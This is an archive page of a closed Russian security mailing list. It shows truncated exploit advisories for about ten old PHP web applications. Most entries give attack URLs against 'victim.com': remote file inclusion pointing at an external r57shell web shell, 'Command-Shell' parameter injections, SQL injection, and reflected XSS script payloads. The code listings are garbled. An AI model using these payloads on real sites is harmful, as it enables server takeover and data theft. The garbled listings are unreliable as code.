Рассылка закрыта
При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.
Вы можете найти рассылки сходной тематики в Каталоге рассылок.
| ← Август 2025 | ||||||
|
1
|
2
|
3
|
||||
|---|---|---|---|---|---|---|
|
4
|
5
|
6
|
7
|
8
|
9
|
10
|
|
11
|
12
|
13
|
14
|
15
|
16
|
17
|
|
18
|
19
|
20
|
21
|
22
|
23
|
24
|
|
25
|
26
|
27
|
28
|
29
|
30
|
31
|
В наше время взломы сайтов, форумом и чатов стали привычном делом. Для тех кто хочет знать почему это происходит и как этому противостоять и существует наша рассылка.
Статистика
-1 за неделю
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в SixCMS.
Компьютер для продвинутых пользователей В этом выпуске: SixCMS ПО: SixCMS Версия: 6 Сайт: http://www.sixcms.de О SixCMS: SixCMS это хорошо известный коммерческий менеджер управления сайтом. Уязвимость: Ввод параметра "template" в 'detail.php' не проверяется до использования. Доступ к известному файлу вывода через веб-доступ и текущую директорию возможен через технику перемещения директорий. Это возможно через использование ././" в HTTP запросе. Параметр "page" не проверяется до выполнения в файле 'list.php...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в VBZooM.
Компьютер для продвинутых пользователей В этом выпуске: VBZooM ПО: VBZooM Версия: 1.11 Уязвимость: Возможность SQL-запроса не сервере. Использование : http://www.victim.com//show.php?UserID$UserID...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в G Shout.
Компьютер для продвинутых пользователей В этом выпуске: G Shout ПО: G Shout Версия: 1.3.1 Уязвимость: Возможность выполнения кода на сервере. Листинг: include"config.php); include./includes/functions.inc.php); include ./languages/lang$language.php); Использование: http://www.victim.com/G Shout/shoutbox.php?language=Command-Shell Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Shoutpro.
Компьютер для продвинутых пользователей В этом выпуске: Shoutpro ПО: Shoutpro Версия: 1.0 Уязвимость: Возможность выполнения кода на сервере. Листинг: include"config.php); include"functions.php); if $path{ $ips = file$path/lists/bannedips.php); } else { $ips = file"lists/bannedips.php); } if (in_array$REMOTE_ADDR$ips) { echo$bannedmessage); die; } Использование: http://www.victim.com/Shoutpro/include.php?path=Command-Shell Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Simpleshout.
Компьютер для продвинутых пользователей В этом выпуске: Simpleshout ПО: Simpleshout Версия: 1.6.0 Уязвимость: Возможность выполнения кода на сервере. Использование: http://www.victim.com/Simpleshout/sboard.php?config=Command-Shell Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в mcGuestbook.
Компьютер для продвинутых пользователей В этом выпуске: mcGuestbook ПО: mcGuestbook Версия: 1.3 Уязвимость: Возможность дистанционного выполнения удаленного кода с вашего вэб-сервера. Использование: http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt? http://www.example.com/path/ecrire.php?lang=http://yoursite/r57shell.txt? http://www.example.com/path/lire.php?lang=http://yoursite/r57shell.txt? Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в PhpMyFactures.
Компьютер для продвинутых пользователей В этом выпуске: PhpMyFactures ПО: PhpMyFactures Версия: 1.0 Использование: [Guest] http://]/inc/header.php?prefixe_dossier[XSS] [Admin] http://]/remises/ajouter_remise.php?msg[XSS] [Admin] http://]/remises/ajouter_remise.php?tire[XSS] [Admin] http://]/tva/ajouter_tva.php?msg[XSS] [Admin] http://]/stocks/ajouter.php?id_produit=1...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в PHPAskIt.
Компьютер для продвинутых пользователей В этом выпуске: PHPAskIt ПО: PHPAskIt Версия: 2.0.1 Уязвимость: Уязвимость позволяет выполнить код на сервере. Использование: http://www.site.com/[phpaskit_path]/import/convertaa.php?qadir[evil_scripts] http://www.site.com/[phpaskit_path]/import/convertwakqa.php?dir[evil_scripts] Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в 35mmslidegallery.
Компьютер для продвинутых пользователей В этом выпуске: 35mmslidegallery ПО: 35mmslidegallery Версия: 6 Уязвимость: В данном приложении некоторые переменные не проверяются до выполнения. Это позволяет нам вставить любой JavaScript-код и провести XSS-атаку. Использование: http://example.com/lumet/album/index.php?imgdir><script>alert'10)</script> http://example.comr/lumet/album/popup.php?w><script>alert'10)</script> http://example.com/lumet/album/popup.php?h><script>alert'10)</script> http:...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Ltwcalendar.
Компьютер для продвинутых пользователей В этом выпуске: Ltwcalendar ПО: Ltwcalendar Версия: 4.1.3 Уязвимость: Уязвимость заключается в возможности выполнять произвольный код на сервере. Код: require_once./private/ltw_config.php); require_once$ltw_config'include_dir'/ltw_classes.php); Использование: http://www.victim.com/Ltwcalendar/calendar.php?ltw_config[include_dir=Command-Shell Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно н...
